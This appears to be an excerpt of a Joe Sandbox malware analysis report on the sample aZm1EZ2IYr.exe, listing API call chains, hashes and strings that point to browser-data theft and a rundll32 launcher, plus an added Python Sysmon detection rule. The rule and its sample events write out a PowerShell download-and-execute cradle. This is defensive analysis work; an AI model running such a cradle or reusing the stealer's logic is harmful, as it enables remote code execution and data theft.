                                                                                                                                                                        • Instruction Fuzzy Hash: 39419531D002299BDF12FBA4EC829CDBBB4EF29704F5181A6F554B7152DB70AE468F90
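The strings and the ShellExecuteEx call in the function above describe the "Powershell download and execute" behaviour flagged in the signature list: a path under C:\ProgramData\ with a .ps1 suffix is assembled, and the 32-bit powershell.exe is launched with -nop -c "iex(New-Object Net.WebClient).DownloadString('…')". The block below is an added detection example, not code from the report; it correlates a staged .ps1 in C:\ProgramData\ with the cradle that loads it over constructed Sysmon-style records (EventID 11 FileCreate, EventID 1 ProcessCreate). The file name "stage.ps1" and the assumption that the DownloadString() argument is that staged path are illustrative; the report does not show the argument.

```python
import re

# Cradle as seen in the listing: -nop -c "iex(New-Object Net.WebClient).DownloadString('<arg>')"
CRADLE_RE = re.compile(
    r"""-nop\s+-c\s+"?iex\(New-Object\s+Net\.WebClient\)\.DownloadString\('([^']+)'\)""",
    re.IGNORECASE,
)

# A .ps1 dropped directly under C:\ProgramData\ (the prefix and suffix strings
# from the listing); subdirectories are deliberately excluded to keep the rule tight.
PS1_IN_PROGRAMDATA = re.compile(r"^C:\\ProgramData\\[^\\]+\.ps1$", re.IGNORECASE)

# Constructed Sysmon-style records (not from the sandbox run): a FileCreate by
# the sample, the cradle launched by the sample, and a benign PowerShell launch
# from explorer.exe that must not alert. Field names follow Sysmon's schema.
SAMPLE_EVENTS = [
    {"EventID": 11,
     "Image": r"C:\Users\victim\Desktop\aZm1EZ2IYr.exe",
     "TargetFilename": r"C:\ProgramData\stage.ps1"},
    {"EventID": 1,
     "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Users\victim\Desktop\aZm1EZ2IYr.exe",
     "CommandLine": r'''"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -nop -c "iex(New-Object Net.WebClient).DownloadString('C:\ProgramData\stage.ps1')"'''},
    {"EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
]


def detect(events):
    """Return one alert per cradle launch; severity rises when its argument
    is a .ps1 that an earlier event shows being written under C:\\ProgramData\\."""
    staged = {}  # lower-cased .ps1 path -> image that wrote it
    alerts = []
    for ev in events:
        if ev["EventID"] == 11 and PS1_IN_PROGRAMDATA.match(ev["TargetFilename"]):
            staged[ev["TargetFilename"].lower()] = ev["Image"]
            continue
        if ev["EventID"] != 1:
            continue
        m = CRADLE_RE.search(ev["CommandLine"])
        if not m:
            continue
        target = m.group(1)
        writer = staged.get(target.lower())
        alerts.append({
            # The cradle alone is worth a medium: -nop plus iex of a downloaded
            # string is rarely legitimate. Staged file + cradle from the same
            # dropper is the full chain seen in this sample.
            "severity": "high" if writer else "medium",
            "parent": ev["ParentImage"],
            "target": target,
            "staged_by": writer,
            # 32-bit PowerShell from SysWOW64 on a 64-bit host is itself a
            # signal: it follows the bitness of the 32-bit dropper, not a user.
            "wow64": "\\syswow64\\" in ev["Image"].lower(),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

DownloadString() accepts a local path as well as a URL, so feeding it the dropped .ps1 lets the dropper run a script without -File and without the execution policy ever being consulted; the rule therefore keys on the cradle shape rather than on a URL scheme. Script Block Logging (Event 4104) would still capture the decoded script body and is the second place to look once this alert fires.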
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?,00000000,?), ref: 00195EC8
                                                                                                                                                                          • Part of subcall function 00191D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00191DD2
                                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00195EE5
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00195F04
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00195F18
                                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 00195F2B
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00195F3F
                                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 00195F52
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 00191D67: GetFileAttributesA.KERNEL32(?,?,?,0018DA54,?,?,?), ref: 00191D6E
                                                                                                                                                                          • Part of subcall function 00195B4D: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00195B72
                                                                                                                                                                          • Part of subcall function 00195B4D: HeapAlloc.KERNEL32(00000000), ref: 00195B79
                                                                                                                                                                          • Part of subcall function 00195B4D: wsprintfA.USER32 ref: 00195B92
                                                                                                                                                                          • Part of subcall function 00195B4D: FindFirstFileA.KERNEL32(?,?), ref: 00195BA9
                                                                                                                                                                          • Part of subcall function 00195B4D: StrCmpCA.SHLWAPI(?,001B6AA0), ref: 00195BCA
                                                                                                                                                                          • Part of subcall function 00195B4D: StrCmpCA.SHLWAPI(?,001B6AA4), ref: 00195BE4
                                                                                                                                                                          • Part of subcall function 00195B4D: wsprintfA.USER32 ref: 00195C0B
                                                                                                                                                                          • Part of subcall function 00195B4D: CopyFileA.KERNEL32(?,?,00000001), ref: 00195CC8
                                                                                                                                                                          • Part of subcall function 00195B4D: DeleteFileA.KERNEL32(?), ref: 00195CEB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: lstrcat$File$Heapwsprintf$AllocAttributesCopyDeleteFindFirstFolderPathProcesslstrcpy
• String ID:
• API String ID: 1546541418-0
• Opcode ID: f0430a7123c5a2207239041def5f3b18dd37013914119af974f80e408bed90f9
• Instruction ID: 7995d2d7a98edcd306b3a845332765a8db06e173911983d488f2447db2b39643
• Opcode Fuzzy Hash: f0430a7123c5a2207239041def5f3b18dd37013914119af974f80e408bed90f9
• Instruction Fuzzy Hash: F951C9B5A0011C9BCF65DB64DC85ADDB7F9AB4C310F4444E6FA09E3250EB70AB898F54
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: Name::operator+$NameName::
• String ID: throw(
• API String ID: 168861036-3159766648
• Opcode ID: 1215b84ecf3e47d6f37de9e9d439bbc425903b9c90388ea284edf27c15c0c858
• Instruction ID: f823cf4efe8886d1c4d70b3340e5b269aee4ba75cba35da78d3d6be22d07ca6d
• Opcode Fuzzy Hash: 1215b84ecf3e47d6f37de9e9d439bbc425903b9c90388ea284edf27c15c0c858
• Instruction Fuzzy Hash: 84019234640209BFCF04EBA4D846EEE7BB9EF54704F448069F505EB2A5DB70DA46C784
APIs
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: strtok_s
• String ID:
• API String ID: 3330995566-0
• Opcode ID: 1724f54abed4fd33d0a3431070f5284a64d576125f861060ecacf6f73e549b6b
• Instruction ID: c8d5c50f98e8dadfc9b009d0d4fc9c581a17356ac923f845f59724d8295ad5f8
• Opcode Fuzzy Hash: 1724f54abed4fd33d0a3431070f5284a64d576125f861060ecacf6f73e549b6b
• Instruction Fuzzy Hash: C2319075E41205EFCF199FA4CC85B69BBACFF18705F22405AE816DB192DB34CB419B40
APIs
• _memset.LIBCMT ref: 001956E4
• RegOpenKeyExA.ADVAPI32(80000001,00000000,00020119,?,?,00000000,?), ref: 00195704
• RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 0019572A
• RegCloseKey.ADVAPI32(?), ref: 00195736
• lstrcatA.KERNEL32(?,?), ref: 00195765
• lstrcatA.KERNEL32(?), ref: 00195778
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: lstrcat$CloseOpenQueryValue_memset
• String ID:
• API String ID: 3891774339-0
• Opcode ID: f1193a71893b2deb19e163e0aeee8481d6ca13d761e8279cd13d85c2d508ed82
• Instruction ID: ea760a5551a83c3c3a437b8bd5600cfcb4387e36000a7777b5563e874c24ecea
• Opcode Fuzzy Hash: f1193a71893b2deb19e163e0aeee8481d6ca13d761e8279cd13d85c2d508ed82
• Instruction Fuzzy Hash: D3415B7298001DAFCF16AB24EC86EE9777DBB28300F0004A6B509A3161EF705E85CF90
APIs
  • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
  • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
  • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
  • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                          • Part of subcall function 00191C1F: GetSystemTime.KERNEL32(?,001B66E2,?), ref: 00191C4E
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                        • ShellExecuteEx.SHELL32(?), ref: 00192BC4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                                        • String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                                                                                                                                                        • API String ID: 2215929589-2108736111
                                                                                                                                                                        • Opcode ID: 11177c928173af18e390ee26cbc14617d53fa21e473e9a15f238f5c44bc8c4b5
                                                                                                                                                                        • Instruction ID: 79345b9e935f392e680343a428a913c46b4bb7a8b31c42726cd5d413d694d95f
                                                                                                                                                                        • Opcode Fuzzy Hash: 11177c928173af18e390ee26cbc14617d53fa21e473e9a15f238f5c44bc8c4b5
                                                                                                                                                                        • Instruction Fuzzy Hash: 89719632D005299BDF12FFA4EC429CDB7B4AF29704F524061F960B7162DB70AE4A8F90
                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 0018830C
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,-0000001F,00000000,?,?), ref: 00188341
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocLocal_memset
                                                                                                                                                                        • String ID: ERROR_V128$v10$v20
                                                                                                                                                                        • API String ID: 52611349-1964637325
                                                                                                                                                                        • Opcode ID: e277b41c235d36b63d12e056cff5c7b4d2d9271189b348b55fb9c17cde10b90a
                                                                                                                                                                        • Instruction ID: f89f33d47bf028f031c911378068b663f93f63819689b20068009878a9d7ee17
                                                                                                                                                                        • Opcode Fuzzy Hash: e277b41c235d36b63d12e056cff5c7b4d2d9271189b348b55fb9c17cde10b90a
                                                                                                                                                                        • Instruction Fuzzy Hash: 1A41AF72A00118ABCB10EFA9DC419EE7BA9FF54B10F554525FD00E7280EB70EE458BA0
                                                                                                                                                                        APIs
                                                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0018F29C
                                                                                                                                                                          • Part of subcall function 001AEC95: std::exception::exception.LIBCMT ref: 001AECAA
                                                                                                                                                                          • Part of subcall function 001AEC95: __CxxThrowException@8.LIBCMT ref: 001AECBF
                                                                                                                                                                          • Part of subcall function 001AEC95: std::exception::exception.LIBCMT ref: 001AECD0
                                                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0018F2BB
                                                                                                                                                                        • _memmove.LIBCMT ref: 0018F2F5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
• String ID: invalid string position$string too long
• API String ID: 3404309857-4289949731
• Opcode ID: f0f44e7635b151cfeb665843e9c5ed5b38e06191b50cdebfd3d3fdbff80cf609
• Instruction ID: 10f9ce4ca2b852f17e9ebcc47fa01c571dafaf73a84386fb2b783ec25af69753
• Opcode Fuzzy Hash: f0f44e7635b151cfeb665843e9c5ed5b38e06191b50cdebfd3d3fdbff80cf609
• Instruction Fuzzy Hash: FA115E753006059FDB08FF68D89196973AAFF55320754452DF816CB282C770EA82CF95
APIs
  • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
• lstrlenA.KERNEL32(?), ref: 0018947C
• lstrlenA.KERNEL32(?), ref: 00189497
  • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
  • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
  • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
  • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
  • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
  • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: lstrcpy$lstrlen$lstrcat
• String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
• API String ID: 2500673778-2241552939
• Opcode ID: 59b8accaadd6a912d86efc7172105d91f070aa2b57fcc5ca5b1e2ca5434e4530
• Instruction ID: 8b26090aa275ff6fdd96b5cf81d3a6048112754e1ead2a03ef429bc585b77244
• Opcode Fuzzy Hash: 59b8accaadd6a912d86efc7172105d91f070aa2b57fcc5ca5b1e2ca5434e4530
• Instruction Fuzzy Hash: FA714E32D00129ABDF02FBA4ED468DDB7B4EF29705F524061F511B71A2DB70AE468F91
APIs
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: _freemalloc
• String ID:
• API String ID: 3576935931-0
• Opcode ID: 5f9960712b1479561553a040ecadc8582bf34c72aeeb82c6e2f0921975b7e853
• Instruction ID: 2a17386375a8561f70a02dd0768d171fe56fa909a9212a52191c8ff79713ffc6
• Opcode Fuzzy Hash: 5f9960712b1479561553a040ecadc8582bf34c72aeeb82c6e2f0921975b7e853
• Instruction Fuzzy Hash: 36113A3B408A00EBCF223FB4BC05B5A7B97AF573B0B704125F859AA551DB34888087A4
APIs
• StrStrA.SHLWAPI(?,00000000,?,?,?,001937D4,00000000,00000010), ref: 001920EE
• lstrcpynA.KERNEL32(003DE718,?,00000000,?), ref: 00192107
• lstrlenA.KERNEL32(?), ref: 00192119
• wsprintfA.USER32 ref: 0019212B
Strings
